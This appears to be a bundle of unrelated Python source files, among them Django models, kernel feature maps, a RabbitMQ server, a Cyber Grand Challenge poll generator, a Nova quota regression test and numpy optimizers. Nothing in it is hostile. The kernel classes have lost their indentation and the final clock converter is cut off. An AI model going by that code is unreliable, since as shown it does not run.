from model_utils.models import TimeStampedModel
from experiments_manager.models import ChosenExperimentSteps
class ExperimentMeasure(models.Model):
    """A named quality measure with per-level feedback messages."""
    name = models.CharField(max_length=255, editable=False)
    description = models.TextField()
    high_message = models.CharField(max_length=255, default='High')
    medium_message = models.CharField(max_length=255, default='Medium')
    low_message = models.CharField(max_length=255, default='Low')

    def __str__(self):
        return 'Measurement of {0}'.format(self.name)

    def _named(self, message):
        # Prefix a level message with this measure's name.
        return '{0}: {1}'.format(self.name, message)

    def get_low_message(self):
        return self._named(self.low_message)

    def get_medium_message(self):
        return self._named(self.medium_message)

    def get_high_message(self):
        return self._named(self.high_message)

    def slug(self):
        # slugify() yields dashes; underscores are template-friendly.
        return slugify(self.name).replace('-', '_')
class RawMeasureResult(models.Model):
    """A single raw key/value pair captured during a scan."""
    key = models.CharField(max_length=255)
    value = models.CharField(max_length=1000)

    def __str__(self):
        return 'Key: %s with value: %s' % (self.key, str(self.value))
class ExperimentMeasureResult(TimeStampedModel):
    """Outcome (High/Medium/Low) of one measure for one experiment step."""
    HIGH = 'H'
    MEDIUM = 'M'
    LOW = 'L'
    SCALE = (
        (HIGH, 'High'),
        (MEDIUM, 'Medium'),
        (LOW, 'Low'),
    )
    step = models.ForeignKey(to=ChosenExperimentSteps)
    measurement = models.ForeignKey(to=ExperimentMeasure)
    result = models.CharField(max_length=1, choices=SCALE)
    raw_values = models.ManyToManyField(to=RawMeasureResult)

    def get_message(self):
        # A falsy result means the scan never produced a verdict.
        if not self.result:
            return 'Result missing'
        getters = {
            ExperimentMeasureResult.LOW: self.measurement.get_low_message,
            ExperimentMeasureResult.MEDIUM: self.measurement.get_medium_message,
            ExperimentMeasureResult.HIGH: self.measurement.get_high_message,
        }
        return getters[self.result]()

    def get_class(self):
        # Bootstrap contextual class for rendering the result badge.
        if not self.result:
            return "default"
        bootstrap = {
            ExperimentMeasureResult.LOW: 'danger',
            ExperimentMeasureResult.MEDIUM: 'warning',
            ExperimentMeasureResult.HIGH: 'success',
        }
        return bootstrap[self.result]

    def slug(self):
        return self.measurement.slug()

    def __str__(self):
        return "Workbench scan of {0}".format(self.measurement.name)
|
import numpy as np
from scipy.spatial.distance import pdist
class Fourier:
def __init__(self, X, k=60000, sigma=None):
self.X = X
self.k = k
self.N = X.shape[0]
self.d = k
if sigma is None:
sample_size = min(self.N, max(1000, int(X.shape[0]/10)))
self.set_sigma(sample_size)
else:
self.sigma = sigma
self.generate_feature_vectors()
pass
def set_sigma(self, sample_size):
# About 2000 is good.
print('determine kernel bandwidth using {} points.'.format(sample_size))
X_sample_indices = np.random.choice(self.N, sample_size, replace=False)
X_sample = self.X[X_sample_indices]
assert X_sample is not None
pairwise_distances = pdist(X_sample)
# TODO: try mean instead of median.
median_dist = np.median(pairwise_distances)
print("median distance for {} samples from N: {}".format(
sample_size, median_dist))
self.sigma = median_dist
def generate_feature_vectors(self):
"""
independently sample every coordinate for every vector from a
standard normal distribution (with unit variance).
"""
n = self.X.shape[1]
self.vectors = np.random.randn(n, self.k)
def transform(self, X):
#dot_prod = X.dot(self.vectors)
#return np.exp(dot_prod/self.sigma)
return np.sin(np.dot(X, self.vectors)/self.sigma)
def info(self):
return {'sigma':[self.sigma]}
class RBFKernel:
def __init__(self, X, sigma=None):
self.X = X
self.N = X.shape[0]
self.d = X.shape[0] # N by d --> N by N
if sigma is None:
sample_size = min(self.N, max(1000, int(X.shape[0]/10)))
self.set_sigma(sample_size)
else:
self.sigma = sigma
self.name = 'radial basis function'
def set_sigma(self, sample_size):
"""
setting σ is often done with the ’median trick’, which is the median
of the pairwise distances (between the x’s) in your dataset.
Randomly grab a few pairs of points and estimate the mean distance
between a random pair of points rather than the median).
Then multiplicatively cut it down by some factor (maybe 2, 4, 8, ...
depending on the problem).
:param sample_size: number of samples to chose the median based on
:return:
"""
print('determine RBF kernel bandwidth using {} points.'.format(
sample_size))
X_sample_indices = np.random.choice(self.N, sample_size, replace=False)
X_sample = self.X[X_sample_indices]
assert X_sample is not None
pairwise_distances = pdist(X_sample)
# TODO: try mean instead of median.
median_dist = np.median(pairwise_distances)
print("median distance for {} samples from N: {}".format(
sample_size, median_dist))
self.sigma = median_dist
def transform_vector(self, xi):
"""
transforms a single point
"""
dist = np.linalg.norm(self.X - xi, axis=1)
dist_squared = np.multiply(dist, dist)
return np.exp(dist_squared/(-2.)/self.sigma**2)
def transform(self, X):
"""
Transforms a matrix, which isn't necessarily self.X
"""
# TODO: could apply only to the first 1/2 of point (I think)
return np.apply_along_axis(func1d=self.transform_vector, axis=1, arr=X)
def info(self):
return {'sigma':[self.sigma]}
class NoKernel:
    """Identity 'kernel': transform() hands back its input untouched.

    Exists so kernelized and un-kernelized code paths share one API.
    """

    def __init__(self, X):
        self.X = X
        self.N, self.d = X.shape

    def transform(self, X):
        # Deliberately a no-op.
        return X

    def info(self):
        return {"null kernel": [None]}
|
#!/usr/bin/env python
import logging
import sys
from os import environ
from time import sleep
import json
from uuid import uuid4
from celery import Celery
import pika
def init_logging():
    """Create and return the 'server' logger with one INFO-level stream
    handler using the bracketed level/timestamp format."""
    log = logging.getLogger('server')
    log.setLevel(logging.INFO)
    handler = logging.StreamHandler()
    handler.setFormatter(
        logging.Formatter('[%(levelname)s] - [%(asctime)s] - %(message)s'))
    log.addHandler(handler)
    return log
def init_celery():
    """Build the Celery app (redis broker/backend) and register its
    single 'data' broadcast task."""
    redis = environ.get('REDIS_HOST', 'localhost')
    app = Celery('server',
                 broker='redis://{}:6379/2'.format(redis),
                 backend='redis://{}:6379/3'.format(redis))

    @app.task
    def data():
        # Broadcast a payload notification on the 'logs' fanout exchange.
        connection = mq_connection()
        channel = connection.channel()
        channel.exchange_declare(exchange='logs', type='fanout')
        message = json.dumps({'data': {'uuid': str(uuid4()), 'message': 'Payload incoming', 'type': 'data'}})
        channel.basic_publish(exchange='logs', routing_key='', body=message)
        logger.info("[x] Sent {0}".format(message))

    return app
# Module-level singletons, created at import time so the celery worker
# and the __main__ entry points share them.
logger = init_logging()
celery = init_celery()
def mq_connection(blocking=True):
    """Open a TLS-authenticated connection to RabbitMQ (port 5671).

    Only blocking connections are implemented; any other request raises.
    """
    if not blocking:
        raise Exception('Only blocking is supported right now')
    credentials = pika.PlainCredentials(environ.get('RABBITMQ_USER', 'rabbit'),
                                        environ.get('RABBITMQ_PASS', 'rabbit'))
    ssl_opts = {'ca_certs': '/tmp/ca/cacert.pem',
                'certfile': '/tmp/client/cert.pem',
                'keyfile': '/tmp/client/key.pem'}
    return pika.BlockingConnection(pika.ConnectionParameters(
        host=environ.get('RABBITMQ_HOST', 'localhost'), port=5671,
        credentials=credentials, ssl=True, ssl_options=ssl_opts))
def registrator():
    """Consume registration/heartbeat messages from the 'registrator'
    fanout exchange and log them until interrupted."""
    logger.info(' [*] Waiting for clients. To exit press CTRL+C')
    connection = mq_connection()
    channel = connection.channel()
    channel.exchange_declare(exchange='registrator', type='fanout')
    result = channel.queue_declare()
    queue_name = result.method.queue
    channel.queue_bind(exchange='registrator', queue=queue_name)

    def callback(ch, method, properties, body):
        # Decode once -- the original re-parsed the JSON payload for
        # every field it looked at.
        payload = json.loads(body)
        kind = payload.get('type')
        if kind == 'registration':
            logger.info('Registered client {}'.format(payload.get('client')))
        elif kind == 'heartbeat':
            logger.info('Client {} alive'.format(payload.get('client')))
        else:
            logger.warning('Unknown message')

    channel.basic_consume(callback, queue=queue_name, no_ack=True)
    channel.start_consuming()
def run():
    """Publish a status message on the 'logs' fanout exchange every 15
    seconds, 10000 times, then close the connection."""
    connection = mq_connection()
    channel = connection.channel()
    channel.exchange_declare(exchange='logs', type='fanout')
    for counter in range(10000):
        message = json.dumps({'message': "Here's the server, over!"})
        channel.basic_publish(exchange='logs', routing_key='', body=message)
        logger.info("[x] Sent {0} #{1}".format(message, counter))
        sleep(15)
    connection.close()
if __name__ == '__main__':
    # 'python server.py registrator' runs the consumer; any other
    # invocation runs the publisher loop.
    if len(sys.argv) > 1 and sys.argv[1:][0] == 'registrator':
        registrator()
    else:
        run()
|
import struct
import time
import sys
import random
import string
def randString( z ):
    """Return a random alphanumeric string of length z.

    Uses string.ascii_lowercase / ascii_uppercase, which exist in both
    Python 2 and 3 (string.lowercase/uppercase were removed in Python 3)
    and denote the same characters in the default locale.
    """
    chars = string.ascii_lowercase + string.ascii_uppercase + string.digits
    return ''.join(random.choice(chars) for _ in range(z))
def delfile( dirs ):
    """Emit REPO (delete) traffic for a random file and remove it from
    the in-memory mirror; returns '' if no file is found in 30 tries."""
    target = ''
    attempts = 0
    # Try up to 30 random directories looking for one that has a file.
    while target == '' and attempts < 30:
        entry = random.choice(dirs)
        attempts += 1
        if not entry[1]:
            continue
        victim = random.choice(entry[1])
        entry[1].remove(victim)
        target = victim[0]
    if target == '':
        return ''
    data = '\t\t<write echo="ascii"><data>REPO\\x%.2x%s</data></write>\n' %(len(target), target)
    # The CB echoes back only the basename of the removed path.
    basename = target[target.rfind('/') + 1:]
    data += '\t\t<read echo="ascii"><delim>\\n</delim><match><data>[INFO] %s removed\\n</data></match></read>\n' %(basename)
    return data
def addfile( dirs ):
    """Emit SEND (upload) traffic for a new random file under a random
    directory, and record it in the in-memory mirror."""
    entry = random.choice( dirs )
    base_dir = entry[0]
    # Leave room for the generated name inside the 254-byte path limit.
    if (254 - len(base_dir)) < 10:
        return ''
    newfile = base_dir + '/' + randString( random.randint(4, 10) )
    fdata = randString( random.randint(20,100) )
    req = 'SEND\\x%.2x%s' %(len(newfile), newfile)
    # 16-bit little-endian length prefix for the file contents.
    req += '\\x%.2x\\x%.2x%s' %( len(fdata)&0xff, (len(fdata)>>8)&0xff, fdata )
    data = '\t\t<write echo="ascii"><data>%s</data></write>\n' %(req)
    data += '\t\t<read echo="ascii"><delim>\\n</delim><match><data>[INFO] File received: %s\\n</data></match></read>\n' %(newfile)
    entry[1].append( [newfile, fdata] )
    return data
def getFile( dirs ):
    """Emit RECV (download) traffic for a random existing file.

    Tries up to 30 random directories looking for one that actually
    contains files; returns '' when none is found.

    Bug fix: the original tested ``len(z[1]) != 1``, which skipped
    directories holding exactly one file and aborted the search on an
    empty directory -- the comment says the intent is "a base dir with
    a file", i.e. a non-empty file list.
    """
    files = []
    cnt = 0
    while files == [] and cnt < 30:
        entry = random.choice( dirs )
        if len(entry[1]) != 0:
            files = entry[1]
            break
        cnt += 1
    if files == []:
        return ''
    fl = random.choice(files)
    req = 'RECV\\x%.2x%s' %( len(fl[0]), fl[0] )
    data = '\t\t<write echo="ascii"><data>%s</data></write>\n' %(req)
    data += '\t\t<read echo="ascii"><delim>\\n</delim><match><data>[DATA] %s\\n</data></match></read>\n' %(fl[1])
    return data
def addDir( dirs ):
    """Emit NDIR traffic creating a random new subdirectory, and append
    it (empty) to the in-memory mirror."""
    parent = random.choice( dirs )
    base_dir = parent[0]
    # Keep the full path comfortably inside the 254-byte limit.
    if (254 - len(base_dir)) < 10:
        return ''
    newdir = base_dir + '/' + randString( random.randint(4, 10) )
    payload = 'NDIR\\x%.2x%s' %(len(newdir), newdir)
    data = '\t\t<write echo="ascii"><data>' + payload + '</data></write>\n'
    data += '\t\t<read echo="ascii"><delim>\\n</delim><match><data>[INFO] Added new directory\\n</data></match></read>\n'
    dirs.append( [ newdir, [] ] )
    return data
def addPrint( dirs ):
    """Emit PRNT traffic plus the expected name-sorted listing of all
    directories and files (the root pseudo-directory '' is omitted)."""
    listing = []
    for directory in dirs:
        for f in directory[1]:
            listing.append( [ f[0], 'File', str(len(f[1]))] )
        if directory[0] == '':
            continue
        listing.append( [directory[0], 'Dir', '' ])
    listing.sort(key=lambda item: item[0])
    data = '\t\t<write echo="ascii"><data>PRNT</data></write>\n'
    data += '\t\t<read echo="ascii"><delim>\\n</delim><match><data>[INFO] Listing files\\n</data></match></read>\n'
    for item in listing:
        # Files carry their size; directories have no trailing field.
        size = ' ' + item[2] if item[1] == 'File' else ''
        data += '\t\t<read echo="ascii"><delim>\\n</delim><match><data>%s %s%s\\n</data></match></read>\n' %(item[0], item[1], size)
    return data
def addStop():
    """Emit the STOP command and its expected acknowledgement."""
    lines = [
        '\t\t<write echo="ascii"><data>STOP</data></write>\n',
        '\t\t<read echo="ascii"><delim>\\n</delim><match><data>[INFO] Terminating\\n</data></match></read>\n',
    ]
    return ''.join(lines)
def newpoll( ind ):
    """Generate one replay-XML poll file (POLL<ind>.xml).

    Builds a random sequence of directory/file operations against an
    in-memory mirror of the CB filesystem, emitting the expected
    protocol traffic for each into the XML body.
    """
    # dir_structure mirrors remote state: [path, [[filename, data], ...]];
    # the first entry is the root pseudo-directory ''.
    dir_structure = [ ['', [] ] ]

    data = '<?xml version="1.0" standalone="no" ?>\n'
    data += '<!DOCTYPE pov SYSTEM "/usr/share/cgc-replay/replay.dtd">\n'
    data += '<pov>\n'
    data += '\t<cbid>CROMU_00033</cbid>\n'
    data += '\t<replay>\n'

    flist = [addDir, addfile, getFile]

    repo = 0
    for i in range(0, random.randint(105, 200)):
        # Deletions only become possible after the first 100 actions.
        if i == 100:
            flist.append(delfile)
        b = random.choice( flist )
        if b == delfile:
            repo = 1
        data += b( dir_structure )

    ### Only add this in if a file has been not been deleted
    if repo == 0:
        data += addPrint( dir_structure )
    data += addStop()

    data += '\t</replay>\n'
    data += '</pov>\n'

    # NOTE(review): "wb" with a str payload is Python-2 style; under
    # Python 3 this write would need bytes -- confirm target interpreter.
    f = open("./poller/for-testing/POLL%.5d.xml" %(ind), "wb")
    f.write(data)
    f.close()
if __name__ == '__main__':
    # Reproducible generation: the RNG seed defaults to the current time
    # but can be pinned via a single command-line argument.
    seed = time.time()
    if len(sys.argv) == 2:
        seed = int(sys.argv[1])
    random.seed(seed)
    # range(1, 1000) produces polls numbered 1..999 (999 files).
    for i in range(1, 1000):
        newpoll(i)
|
from golem.core.deferred import sync_wait
from golem.interface.command import group, Argument, command, CommandResult
@group(name="envs", help="Manage environments")
class Environments(object):
    """CLI command group for listing and toggling compute environments."""

    name = Argument('name', help="Environment name")

    table_headers = ['name', 'supported', 'active', 'performance',
                     'description']

    sort = Argument(
        '--sort',
        choices=table_headers,
        optional=True,
        default=None,
        help="Sort environments"
    )

    @command(argument=sort, help="Show environments")
    def show(self, sort):
        # Resolve the deferred synchronously; fall back to an empty list.
        environments = sync_wait(Environments.client.get_environments()) or []
        rows = [
            [
                env['id'],
                str(env['supported']),
                str(env['accepted']),
                str(env['performance']),
                env['description'],
            ]
            for env in environments
        ]
        return CommandResult.to_tabular(Environments.table_headers, rows,
                                        sort=sort)

    @command(argument=name, help="Enable environment")
    def enable(self, name):
        return sync_wait(Environments.client.enable_environment(name))

    @command(argument=name, help="Disable environment")
    def disable(self, name):
        return sync_wait(Environments.client.disable_environment(name))

    @command(argument=name, help="Recount performance for an environment")
    def recount(self, name):
        # Benchmarks can be slow; allow up to 30 minutes.
        return sync_wait(Environments.client.run_benchmark(name), timeout=1800)
|
from __future__ import division
import Tkinter
import preset
from engine2d import Engine2D
from engine3d import Engine3D
from util import *
# The single Simulator instance, created in main(); the Tk callbacks
# (on_click / on_key_press) reach it through this module-level global.
simulator = None

# Maps key characters to camera method names.  The \uf70x codes are the
# macOS arrow-key function characters delivered by Tk.
keymap = {
    u'\uf700': 'up',
    u'\uf701': 'down',
    u'\uf702': 'left',
    u'\uf703': 'right',
    'z': 'zoom_in',
    'x': 'zoom_out',
    'w': 'rotate_up',
    's': 'rotate_down',
    'a': 'rotate_left',
    'd': 'rotate_right'
}
class Map(dict):
    """dict whose keys are also readable as attributes.

    Missing keys yield None instead of raising AttributeError.
    """

    def __getattr__(self, key):
        # Invoked only when normal attribute lookup fails, so genuine
        # dict attributes/methods are unaffected.
        return self.get(key)
class Simulator:
    """Owns the Tk window, canvas and physics engine (2D or 3D as chosen
    by the preset's DIMENSION setting)."""

    def __init__(self, preset):
        # The preset is a callable that fills in a config dict; stored in
        # a module-level global so the event handlers can read it too.
        global config
        config = Map(preset({}))
        self.tk = Tkinter.Tk()
        self.tk.title(config.TITLE)
        self.canvas = Tkinter.Canvas(self.tk, bg=config.BACKGROUND, width=config.W, height=config.H)
        self.engine = (Engine2D if config.DIMENSION == 2 else Engine3D)(config, self.canvas, on_key_press)
        self.tk.bind("<Key>", on_key_press)
        self.canvas.bind("<Button-1>", on_click)
        self.canvas.pack()

    def animate(self):
        # The engine drives the animation loop.
        self.engine.animate()
def on_click(event):
    """Canvas click handler.

    While paused, a click inside an existing object opens its control
    box; any other click (or a click while animating) creates a new
    object at the cursor position.
    """
    engine = simulator.engine
    click_x, click_y = event.x, event.y
    if not engine.animating:
        for obj in engine.objs:
            coords = engine.object_coords(obj)
            center_x = (coords[0] + coords[2]) / 2
            center_y = (coords[1] + coords[3]) / 2
            radius = (coords[2] - coords[0]) / 2
            if get_distance(center_x, center_y, click_x, click_y) < radius:
                obj.show_controlbox()
                return
    engine.create_object(event.x, event.y)
def on_key_press(event):
    """Keyboard handler: space toggles the simulation; mapped keys drive
    the camera when the engine's camera supports the action."""
    engine = simulator.engine
    key = event.char
    if key == ' ':
        engine.destroy_controlboxes()
        engine.animating = not engine.animating
        state = "Simulating" if engine.animating else "Paused"
        simulator.tk.title("%s (%s)" % (config.TITLE, state))
        return
    action = keymap.get(key)
    if action is not None and hasattr(engine.camera, action):
        getattr(engine.camera, action)(key)
def main():
    """Build the simulator with the default preset and start the Tk
    event loop (blocks until the window is closed)."""
    global simulator
    simulator = Simulator(preset.DEFAULT)
    simulator.animate()
    Tkinter.mainloop()

if __name__ == "__main__":
    main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
MoEDAL and CERN@school - ANN -> ORI.
See the README.md file and the GitHub wiki for more information.
http://cernatschool.web.cern.ch
"""
# Import the code needed to manage files.
import os, glob
#...for parsing the arguments.
import argparse
#...for the logging.
import logging as lg
#...for handling the annotation JSON information.
import json
# The annotation file wrapper class.
from wrappers.ann import ANN
if __name__ == "__main__":

    print("*")
    print("*====================================*")
    print("* MoEDAL and CERN@school: ANN -> ORI *")
    print("*====================================*")
    print("*")

    # Get the datafile path from the command line.
    parser = argparse.ArgumentParser()
    parser.add_argument("dataPath", help="Path to the input dataset.")
    parser.add_argument("-v", "--verbose", help="Increase output verbosity", action="store_true")
    args = parser.parse_args()

    ## The root data path.
    data_path = args.dataPath

    # Check if the input file exists. If it doesn't, quit.
    if not os.path.exists(data_path):
        raise IOError("* ERROR: '%s' input file does not exist!" % (data_path))

    ## The annotations path.
    ann_path = os.path.join(data_path, "ANN")
    if not os.path.isdir(ann_path):
        raise IOError("* ERROR: '%s' does not exist - no annotation data!" % (ann_path))

    ## The outer ring information data path (created on demand).
    ori_path = os.path.join(data_path, "ORI")
    if not os.path.isdir(ori_path):
        os.mkdir(ori_path)

    # Set the logging level.
    if args.verbose:
        level = lg.DEBUG
    else:
        level = lg.INFO

    # Configure the logging.
    lg.basicConfig(filename=os.path.join('./.', 'log_ann_to_ori.log'), filemode='w', level=level)
    lg.info(" *")
    lg.info(" *====================================*")
    lg.info(" * MoEDAL and CERN@school: ANN -> ORI *")
    lg.info(" *====================================*")
    lg.info(" *")
    lg.info(" * Looking for annotations in        : '%s'" % (ann_path))
    lg.info(" * Writing outer ring information in : '%s'" % (ori_path))
    lg.info(" *")

    # Loop over the found annotation CSV files, one per subject.
    for ann_csv_path in sorted(glob.glob(os.path.join(ann_path, "*.csv"))):

        ## The subject ID (CSV basename without the ".csv" extension).
        sub_id = os.path.basename(ann_csv_path)[:-4]

        ## The annotations found for the subject.
        annotations = ANN(ann_csv_path)

        outer_ring_list = []

        # Loop over the annotations found in the subject.
        # .items() replaces the Python-2-only .iteritems() and works on
        # both interpreter versions.
        for anno_id, anno in annotations.get_annotations().items():

            ## The annotation data.
            d = json.loads(anno)

            # Loop over the task answers for this annotation; task "T0"
            # carries the outer ring values.
            for entry in d:
                if entry["task"] == "T0":
                    for outer_ring_i in entry["value"]:
                        outer_ring_list.append("%s,%.1f,%.1f,%.1f" % (
                            anno_id,
                            outer_ring_i["x"],
                            outer_ring_i["y"],
                            outer_ring_i["r"]))

        ## The ORI CSV filename (and path).
        ori_csv_path = os.path.join(ori_path, "%s.csv" % (sub_id))

        ## The CSV file string to write out.
        # (The original guarded the newline with `i < len(outer_ring_list)`,
        # which is always true -- every row, including the last, gets a
        # trailing newline.  Made unconditional here; output is identical.)
        ori_csv_s = "annotation_id,x,y,r\n"
        for outer_ring_string in outer_ring_list:
            ori_csv_s += outer_ring_string + "\n"

        # Write out the CSV file.
        with open(ori_csv_path, "w") as nf:
            nf.write(ori_csv_s)

        lg.info(" * Subject '%s' found in '%s': % 6d annotations." % (sub_id, ann_csv_path, annotations.get_number_of_annotations()))
        print("* Converted '%s' -> '%s' (%d annotations)." % (ann_csv_path, ori_csv_path, annotations.get_number_of_annotations()))

    lg.info(" *")
    print("*")
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from nova import test
from nova.tests import fixtures as nova_fixtures
from nova.tests.functional import integrated_helpers
from nova.tests.unit.image import fake as fake_image
from nova.tests.unit import policy_fixture
class TestMultiCreateServerGroupMemberOverQuota(
        test.TestCase, integrated_helpers.InstanceHelperMixin):
    """This tests a regression introduced in the Pike release.

    Starting in the Pike release, quotas are no longer tracked using usages
    and reservations tables but instead perform a resource counting operation
    at the point of resource creation.

    When creating multiple servers in the same request that belong in the same
    server group, the [quota]/server_group_members config option is checked
    to determine if those servers can belong in the same group based on quota.
    However, the quota check for server_group_members only counts existing
    group members based on live instances in the cell database(s). But the
    actual instance record isn't created in the cell database until *after* the
    server_group_members quota check happens. Because of this, it is possible
    to bypass the server_group_members quota check when creating multiple
    servers in the same request.
    """

    def setUp(self):
        super(TestMultiCreateServerGroupMemberOverQuota, self).setUp()
        # Cap the group at 2 members so that creating 3 servers must trip
        # the server_group_members quota check.
        self.flags(server_group_members=2, group='quota')
        self.useFixture(policy_fixture.RealPolicyFixture())
        self.useFixture(nova_fixtures.NeutronFixture(self))
        self.useFixture(nova_fixtures.PlacementFixture())
        api_fixture = self.useFixture(nova_fixtures.OSAPIFixture(
            api_version='v2.1'))
        self.api = api_fixture.api
        self.api.microversion = '2.37'  # so we can specify networks='none'
        fake_image.stub_out_image_service(self)
        self.addCleanup(fake_image.FakeImageService_reset)
        # All servers in both tests are created into this one group.
        group = {'name': 'test group', 'policies': ['soft-anti-affinity']}
        self.created_group = self.api.post_server_groups(group)

    def test_multi_create_server_group_members_over_quota(self):
        """Recreate scenario for the bug where we create an anti-affinity
        server group and then create 3 servers in the group using a
        multi-create POST /servers request.
        """
        server_req = self._build_minimal_create_server_request(
            self.api, 'test_multi_create_server_group_members_over_quota',
            image_uuid=fake_image.AUTO_DISK_CONFIG_ENABLED_IMAGE_UUID,
            networks='none')
        # Request three members in a single create; quota only allows two.
        server_req['min_count'] = 3
        server_req['return_reservation_id'] = True
        hints = {'group': self.created_group['id']}
        # We should get a 403 response due to going over quota on server
        # group members in a single request.
        self.api.api_post(
            '/servers', {'server': server_req, 'os:scheduler_hints': hints},
            check_response_status=[403])
        # The rejected request must not have leaked any members into the group.
        group = self.api.api_get(
            '/os-server-groups/%s' %
            self.created_group['id']).body['server_group']
        self.assertEqual(0, len(group['members']))

    def test_concurrent_request_server_group_members_over_quota(self):
        """Recreate scenario for the bug where we create 3 servers in the
        same group but in separate requests. The NoopConductorFixture is used
        to ensure the instances are not created in the nova cell database which
        means the quota check will have to rely on counting group members using
        build requests from the API DB.
        """
        # These aren't really concurrent requests, but we can simulate that
        # by using NoopConductorFixture.
        self.useFixture(nova_fixtures.NoopConductorFixture())
        for x in range(3):
            server_req = self._build_minimal_create_server_request(
                self.api, 'test_concurrent_request_%s' % x,
                image_uuid=fake_image.AUTO_DISK_CONFIG_ENABLED_IMAGE_UUID,
                networks='none')
            hints = {'group': self.created_group['id']}
            # This should result in a 403 response on the 3rd server.
            if x == 2:
                self.api.api_post(
                    '/servers',
                    {'server': server_req, 'os:scheduler_hints': hints},
                    check_response_status=[403])
            else:
                self.api.post_server(
                    {'server': server_req, 'os:scheduler_hints': hints})
        # There should only be two servers created which are both members of
        # the same group.
        servers = self.api.get_servers(detail=False)
        self.assertEqual(2, len(servers))
        group = self.api.api_get(
            '/os-server-groups/%s' %
            self.created_group['id']).body['server_group']
        self.assertEqual(2, len(group['members']))
|
import numpy as np
from .utils import extract
class Optimizer(object):
    """Base class for gradient-based optimizers.

    Subclasses implement ``_rule(v, g)`` (the parameter update) and may
    override ``_construct`` (hyper-parameter setup) and ``finalize_step``
    (per-step bookkeeping such as learning-rate decay).
    """

    def __init__(self, lr = 1e-3, *args, **kwargs):
        """Store the signed learning rate and forward remaining arguments
        to the subclass' ``_construct`` hook.

        The ``minimize`` keyword (default True) flips the sign of the
        learning rate, so the same rules can also ascend an objective.
        """
        minimize, kwargs = extract('minimize', True, **kwargs)
        # +lr descends the gradient; -lr ascends it.
        self._lr = lr * (2. * np.float64(minimize) - 1.)
        self._construct(*args, **kwargs)

    def apply(self, var_slot):
        """Apply this optimizer's update rule to one variable slot."""
        # _current lets stateful rules (e.g. RMSProp/Adam) key their per-slot
        # moment buffers while var_slot drives the actual update.
        self._current = var_slot
        var_slot.apply_grad(self._rule)
        self._current = None

    def finalize_step(self): pass

    # BUGFIX: was declared without ``self``; it only worked because the bound
    # call swallowed the instance into *args.
    def _construct(self, *args, **kwargs): pass
class StochasticDescentOptimizer(Optimizer):
    """Plain SGD with an optional multiplicative learning-rate decay."""

    def _construct(self, decay = 1.):
        # Factor applied to the learning rate at the end of every step.
        self._decay = decay

    def _rule(self, v, g):
        # Step along the (sign-adjusted) learning-rate direction.
        return v - g * self._lr

    def finalize_step(self):
        self._lr = self._lr * self._decay
class RMSPropOptimizer(Optimizer):
    """RMSProp: scales each step by a running RMS of recent gradients."""

    def _construct(self, p = .975):
        # Exponential decay rate of the second-moment accumulator,
        # keyed per variable slot.
        self._p = p
        self._moments = dict()

    def _rule(self, v, g):
        slot = self._current
        # Lazily create the per-slot accumulator, then blend in g^2.
        acc = self._moments.get(slot, 0)
        acc = self._p * acc + (1. - self._p) * g * g
        self._moments[slot] = acc
        # 1e-8 guards the division when the accumulator is still ~0.
        return v - self._lr * np.divide(g, np.sqrt(1e-8 + acc))
class AdamOptimizer(Optimizer):
    """Adam: bias-corrected first and second gradient moments."""

    def _construct(self, p1 = .9, p2 = .999):
        # Decay rates for the first (p1) and second (p2) moment estimates.
        self._p1, self._p2 = p1, p2
        self._moments = dict()

    def _rule(self, v, g):
        slot = self._current
        # Per-slot state: first moment 's', second moment 'r', step count 't'.
        state = self._moments.setdefault(slot, {'s': 0, 'r': 0, 't': 0})
        first = self._p1 * state['s'] + (1. - self._p1) * g
        second = self._p2 * state['r'] + (1. - self._p2) * g * g
        step = state['t'] + 1
        state['s'], state['r'], state['t'] = first, second, step
        # Bias-corrected moment estimates (Adam paper, step 2).
        s_hat = np.divide(first, 1. - np.power(self._p1, step))
        r_hat = np.divide(second, 1. - np.power(self._p2, step))
        return v - self._lr * np.divide(s_hat, np.sqrt(r_hat) + 1e-8)
"""
Optimizer factory
"""
_optimizer_factory = dict({
'sgd' : StochasticDescentOptimizer,
'adam': AdamOptimizer,
'rmsprop': RMSPropOptimizer
})
def optimizer_factory(name, *args, **kwargs):
    """Instantiate a registered optimizer by name ('sgd', 'adam', 'rmsprop').

    Extra positional/keyword arguments are forwarded to the optimizer's
    constructor.

    Raises:
        ValueError: if ``name`` is not a registered optimizer.
    """
    # BUGFIX: validate with an explicit raise instead of ``assert`` — asserts
    # are stripped under ``python -O``, which would turn a bad name into a
    # bare KeyError.
    if name not in _optimizer_factory:
        raise ValueError('Optimizer {} not found'.format(name))
    return _optimizer_factory[name](*args, **kwargs)
|
from Converter import Converter
from time import localtime, strftime
from Components.Element import cached
class ClockToText(Converter, object):
    """Render the source's ``time`` value as text.

    The ``type`` string supplied by the skin selects one of the layouts
    below: a wall-clock time, a date, a duration in minutes, a raw
    timestamp, or an arbitrary strftime format ("Format...").
    """
    # Layout selectors; __init__ maps the type string onto one of these.
    DEFAULT = 0
    WITH_SECONDS = 1
    IN_MINUTES = 2
    DATE = 3
    FORMAT = 4
    AS_LENGTH = 5
    TIMESTAMP = 6
    FULL = 7
    SHORT_DATE = 8
    LONG_DATE = 9
    VFD = 10
    FULL_DATE = 11

    # add: date, date as string, weekday, ...
    # (whatever you need!)

    def __init__(self, type):
        """Map the skin-supplied ``type`` string onto a layout selector."""
        Converter.__init__(self, type)
        if type == "WithSeconds":
            self.type = self.WITH_SECONDS
        elif type == "InMinutes":
            self.type = self.IN_MINUTES
        elif type == "Date":
            self.type = self.DATE
        elif type == "AsLength":
            self.type = self.AS_LENGTH
        elif type == "Timestamp":
            self.type = self.TIMESTAMP
        elif type == "Full":
            self.type = self.FULL
        elif type == "ShortDate":
            self.type = self.SHORT_DATE
        elif type == "LongDate":
            self.type = self.LONG_DATE
        elif type == "FullDate":
            self.type = self.FULL_DATE
        elif type == "VFD":
            self.type = self.VFD
        elif "Format" in type:
            self.type = self.FORMAT
            # Drop the first 7 characters (presumably a "Format:" prefix —
            # TODO confirm against the skins) and keep the raw strftime string.
            self.fmt_string = type[7:]
        else:
            self.type = self.DEFAULT

    @cached
    def getText(self):
        """Return the formatted text for the current source time."""
        time = self.source.time
        if time is None:
            return ""

        # handle durations: here ``time`` is a number of seconds, not an epoch.
